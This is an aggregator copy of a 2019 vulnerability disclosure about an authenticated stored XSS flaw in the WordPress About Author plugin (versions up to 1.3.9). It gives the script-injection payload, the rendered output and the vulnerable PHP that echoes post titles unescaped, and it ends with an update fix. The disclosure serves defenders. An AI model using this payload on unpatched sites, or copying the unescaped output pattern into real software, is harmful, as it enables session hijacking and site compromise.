8

Wordpress About Author <= 1.3.9 Authenticated Stored XSS

 2 years ago
source link: https://nitesculucian.github.io/2019/10/25/about-author-1-3-9-authentificated-stored-xss-vulnerability/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Wordpress About Author <= 1.3.9 Authenticated Stored XSS

Oct 25, 2019

Wordpress About Author <= 1.3.9 Authenticated Stored XSS

Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

Intial submission of the vulnerability

# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability is affecting all pages/routes within the Wordpress Admin panel.

Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

By going within admin panel at About Author > Add new we can add the following payload "><script>alert(1)</script>. This is not the issue, manly XSS vulnerabilities are output related issues. Therefore by looking at /wp-content/plugins/about-author at lines 335-353 we can observe the following unescaped output of user-supplied data, on line 345 that leads to the stored XSS by outputting database stored data.

<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>

The successful exploitation of the vulnerability looks as follows in the HTML output:

<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>

Note that, due to style="display:none;" of the div tag, the vulnerabilitie was available on all pages of the Wordpress Admin panel. Keep in mind that "><script>alert(1)</script> will be executed regardless of the style="display:none;".

How to fix

Update to the latest available version of the About Author plugin.

Public appearances

Other references

Comments


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK